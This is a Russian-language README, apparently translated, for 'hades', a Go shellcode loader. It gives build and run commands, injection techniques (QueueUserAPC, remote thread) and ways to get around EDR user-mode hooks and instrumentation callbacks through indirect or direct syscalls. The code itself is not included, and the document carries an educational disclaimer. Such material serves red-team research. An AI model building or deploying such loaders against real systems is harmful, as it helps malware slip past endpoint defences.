
Загрузчик шелл-кода на Go, который объединяет несколько методов обхода защиты
git clone https://github.com/f1zm0/hades && cd hades
make
Затем перенесите исполняемый файл на x64-хост с Windows и запустите его с помощью .\hades.exe [опции].
PS > .\hades.exe -h
'||' '||' | '||''|. '||''''| .|'''.|
|| || ||| || || || . ||.. '
||''''|| | || || || ||''| ''|||.
|| || .''''|. || || || . '||
.||. .||. .|. .||. .||...|' .||.....| |'....|'
version: dev [11/01/23] :: @f1zm0
Usage:
hades -f <filepath> [-t selfthread|remotethread|queueuserapc]
Options:
-f, --file <str> shellcode file path (.bin)
-t, --technique <str> injection technique [selfthread, remotethread, queueuserapc]
Внедрение shellcode, запускающего calc.exe, с помощью техники queueuserapc:
.\hades.exe -f calc.bin -t queueuserapc
Обход user-mode хуков с сортировкой RVA системных вызовов (NtQueueApcThread перехвачен через frida-trace и кастомный обработчик)

Обход instrumentation callback с помощью косвенных системных вызовов (внедрённая DLL — из syscall-detect от jackullrich)

В последнем релизе возможности прямых системных вызовов заменены на косвенные системные вызовы, предоставляемые acheron. Если по какой-то причине вы хотите использовать предыдущую версию загрузчика с прямыми системными вызовами, нужно явно передать компилятору тег direct_syscalls, чтобы он определил, какие файлы включать и исключать из сборки.
GOOS=windows GOARCH=amd64 go build -ldflags "-s -w" -tags='direct_syscalls' -o dist/hades_directsys.exe cmd/hades/main.go
Предупреждение
Этот проект создан исключительно в образовательных целях, чтобы экспериментировать с разработкой вредоносного ПО на Go и узнать больше о пакете unsafe и странном синтаксисе сборки Go. Не используйте его на системах, которые вам не принадлежат. Разработчик этого проекта не несёт ответственности за любой ущерб, причинённый неправильным использованием этого инструмента.
Отдельное спасибо следующим людям, которые поделились своими знаниями и кодом, вдохновившими этот инструмент:
Этот проект лицензирован на условиях GPLv3 — подробности в файле LICENSE.